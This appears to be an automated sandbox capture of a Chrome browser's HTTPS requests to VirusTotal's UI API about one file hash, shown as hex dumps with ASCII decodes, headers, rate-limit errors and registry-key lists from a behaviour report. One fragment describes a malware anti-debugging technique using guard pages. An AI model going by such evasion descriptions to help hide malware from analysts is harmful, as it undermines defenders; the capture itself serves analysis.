                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1408INData Raw: 6e 2e 6d 64 23 6d 65 74 68 6f 64 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 28 50 41 47 45 5f 47 55 41 52 44 29 3b 20 47 75 61 72 64 20 70 61 67 65 73 20 74 72 69 67 67 65 72 20 61 6e 20 65 78 63 65 70 74 69 6f 6e 20 74 68 65 20 66 69 72 73 74 20 74 69 6d 65 20 74 68 65 79 20 61 72 65 20 61 63 63 65 73 73 65 64 20 61 6e 64 20 63 61 6e 20 62 65 20 75 73 65 64 20 74 6f 20 64 65 74 65 63 74 20 61 20 64 65 62 75 67 67 65 72 2e 20 53 65 65 20 5b 37 5d 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 20 54 68 69 73 20 6d 65 74 68 6f 64 20 69 73 20 72 65 6c 61 74 65 64 20 74 6f 20 55 6e 70 72 6f 74 65 63 74 20 74 65 63 68 6e 69 71 75 65 20 55 30 31
                                                                                                                                                                                                                    Data Ascii: n.md#methods", "description": "(PAGE_GUARD); Guard pages trigger an exception the first time they are accessed and can be used to detect a debugger. See [7] for details. This method is related to Unprotect technique U01


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    219192.168.2.164997774.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC570OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/pe_resource_parents HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 7f6396c06723ae404aef920da69422c4
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:58 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    220192.168.2.164997874.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC959OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTM0NTI4NTU5MTAtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU1LjQx
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC886INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: c1a0e3b63b57f9114a674f5d187ce9ab
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:59 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 159972
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:59 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC522INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 5f 43 41 50 45 20 53 61 6e 64 62 6f 78 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 66 69 6c 65 5f 62 65 68 61 76 69 6f 75 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 5f 62 65 68 61 76 69 6f 75 72
                                                                                                                                                                                                                    Data Ascii: { "data": [ { "id": "76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358_CAPE Sandbox", "type": "file_behaviour", "links": { "self": "https://www.virustotal.com/ui/file_behaviour
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1408INData Raw: 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 46 6f 6c 64 65 72 44 65 73 63 72 69 70 74 69 6f 6e 73 5c 5c 7b 41 45 35 30 43 30 38 31 2d 45 42 44 32 2d 34 33 38 41 2d 38 36 35 35 2d 38 41 30 39 32 45 33 34 39 38 37 41 7d 5c 5c 53 74 72 65 61 6d 52 65 73 6f 75 72 63 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 50 6f 6c 69 63 69 65 73 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 4e 6f 53 65 74 46 6f 6c 64 65 72 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f
                                                                                                                                                                                                                    Data Ascii: ws\\CurrentVersion\\Explorer\\FolderDescriptions\\{AE50C081-EBD2-438A-8655-8A092E34987A}\\StreamResource", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetFolders", "HKEY_
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC546INData Raw: 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 46 6f 6c 64 65 72 44 65 73 63 72 69 70 74 69 6f 6e 73 5c 5c 7b 41 45 35 30 43 30 38 31 2d 45 42 44 32 2d 34 33 38 41 2d 38 36 35 35 2d 38 41 30 39 32 45 33 34 39 38 37 41 7d 5c 5c 52 6f 61 6d 61 62 6c 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 50 6f 6c 69 63 69 65 73 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 4e 6f 49 6e 74 65 72 6e 65 74 49 63 6f 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 6f 66 74 77 61 72
                                                                                                                                                                                                                    Data Ascii: \\Explorer\\FolderDescriptions\\{AE50C081-EBD2-438A-8655-8A092E34987A}\\Roamable", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoInternetIcon", "HKEY_LOCAL_MACHINE\\Softwar
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1408INData Raw: 4c 73 61 5c 5c 46 69 70 73 41 6c 67 6f 72 69 74 68 6d 50 6f 6c 69 63 79 5c 5c 53 54 45 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 46 6f 6c 64 65 72 44 65 73 63 72 69 70 74 69 6f 6e 73 5c 5c 7b 41 45 35 30 43 30 38 31 2d 45 42 44 32 2d 34 33 38 41 2d 38 36 35 35 2d 38 41 30 39 32 45 33 34 39 38 37 41 7d 5c 5c 44 65 66 69 6e 69 74 69 6f 6e 46 6c 61 67 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 4f 46 54 57 41 52
                                                                                                                                                                                                                    Data Ascii: Lsa\\FipsAlgorithmPolicy\\STE", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{AE50C081-EBD2-438A-8655-8A092E34987A}\\DefinitionFlags", "HKEY_LOCAL_MACHINE\\SOFTWAR
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1408INData Raw: 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 46 6f 6c 64 65 72 44 65 73 63 72 69 70 74 69 6f 6e 73 5c 5c 7b 41 45 35 30 43 30 38 31 2d 45 42 44 32 2d 34 33 38 41 2d 38 36 35 35 2d 38 41 30 39 32 45 33 34 39 38 37 41 7d 5c 5c 50 61 72 73 69 6e 67 4e 61 6d 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 43 55 52 52 45 4e 54 5f 55 53 45 52 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 50 6f 6c 69 63 69 65 73 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 50 72 65 76 65 6e 74 49 74 65 6d 43 72 65 61 74 69 6f 6e 49 6e 55 73 65 72 73 46 69 6c 65 73 46 6f 6c 64 65 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: rentVersion\\Explorer\\FolderDescriptions\\{AE50C081-EBD2-438A-8655-8A092E34987A}\\ParsingName", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\PreventItemCreationInUsersFilesFolder",
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1280INData Raw: 41 34 37 2d 33 46 37 32 2d 34 34 41 37 2d 38 39 43 35 2d 35 35 39 35 46 45 36 42 33 30 45 45 7d 5c 5c 53 68 65 6c 6c 46 6f 6c 64 65 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 43 55 52 52 45 4e 54 5f 55 53 45 52 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 50 6f 6c 69 63 69 65 73 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 4e 6f 53 65 74 46 6f 6c 64 65 72 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c
                                                                                                                                                                                                                    Data Ascii: A47-3F72-44A7-89C5-5595FE6B30EE}\\ShellFolder", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetFolders", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1408INData Raw: 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 50 6f 6c 69 63 69 65 73 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 4e 6f 50 72 6f 70 65 72 74 69 65 73 52 65 63 79 63 6c 65 42 69 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 43 55 52 52 45 4e 54 5f 55 53 45 52 5c 5c 43 6f 6e 74 72 6f 6c 20 50 61 6e 65 6c 5c 5c 49 6e 74 65 72 6e 61 74 69 6f 6e 61 6c 5c 5c 47 65 6f 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 43 55 52 52 45 4e 54 5f 55 53 45 52 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c
                                                                                                                                                                                                                    Data Ascii: EY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoPropertiesRecycleBin", "HKEY_CURRENT_USER\\Control Panel\\International\\Geo", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1408INData Raw: 6f 6e 73 5c 5c 7b 41 45 35 30 43 30 38 31 2d 45 42 44 32 2d 34 33 38 41 2d 38 36 35 35 2d 38 41 30 39 32 45 33 34 39 38 37 41 7d 5c 5c 44 65 73 63 72 69 70 74 69 6f 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 43 55 52 52 45 4e 54 5f 55 53 45 52 5c 5c 43 6f 6e 74 72 6f 6c 20 50 61 6e 65 6c 5c 5c 49 6e 74 65 72 6e 61 74 69 6f 6e 61 6c 5c 5c 55 73 65 72 20 50 72 6f 66 69 6c 65 5c 5c 4c 61 6e 67 75 61 67 65 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 43 55 52 52 45 4e 54 5f 55 53 45 52 5c 5c 53 6f 66 74 77 61 72 65 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 50 6f 6c 69 63 69 65 73 5c 5c 4e 6f 6e 45
                                                                                                                                                                                                                    Data Ascii: ons\\{AE50C081-EBD2-438A-8655-8A092E34987A}\\Description", "HKEY_CURRENT_USER\\Control Panel\\International\\User Profile\\Languages", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\NonE
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1280INData Raw: 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 46 6f 6c 64 65 72 44 65 73 63 72 69 70 74 69 6f 6e 73 5c 5c 7b 35 45 36 43 38 35 38 46 2d 30 45 32 32 2d 34 37 36 30 2d 39 41 46 45 2d 45 41 33 33 31 37 42 36 37 31 37 33 7d 5c 5c 43 61 74 65 67 6f 72 79 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 43 55 52 52 45 4e 54 5f 55 53 45 52 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 50 6f 6c 69 63 69 65 73 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 4e 6f 43 6f 6d 6d 6f 6e 47 72 6f 75 70 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: icrosoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\\Category", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoCommonGroups",
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1408INData Raw: 6f 6e 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 46 6f 6c 64 65 72 44 65 73 63 72 69 70 74 69 6f 6e 73 5c 5c 7b 41 45 35 30 43 30 38 31 2d 45 42 44 32 2d 34 33 38 41 2d 38 36 35 35 2d 38 41 30 39 32 45 33 34 39 38 37 41 7d 5c 5c 46 6f 6c 64 65 72 54 79 70 65 49 44 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 43 55 52 52 45 4e 54 5f 55 53 45 52 5c 5c 53 6f 66 74 77 61 72 65 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 43 4c 53 49 44 5c 5c 7b 35 39 30 33 31 41 34 37 2d 33 46 37 32 2d 34 34 41 37 2d 38 39 43 35 2d 35 35 39 35 46 45 36 42 33 30 45 45 7d 5c 5c 53 68 65 6c 6c 46 6f 6c 64 65 72 22 2c 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: on\\Explorer\\FolderDescriptions\\{AE50C081-EBD2-438A-8655-8A092E34987A}\\FolderTypeID", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\ShellFolder",


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    221192.168.2.164997974.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC564OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_ips HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 23cd31875896d58317720bfdf667bcf5
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:59 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    222192.168.2.164998174.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC976OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/votes?relationships=item%2Cvoter HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTUyNzU0MjkyMjUtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU2LjMzMQ==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC883INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 6f021193389105ef340a6dd0528e534b
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:59 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 241
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:59 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
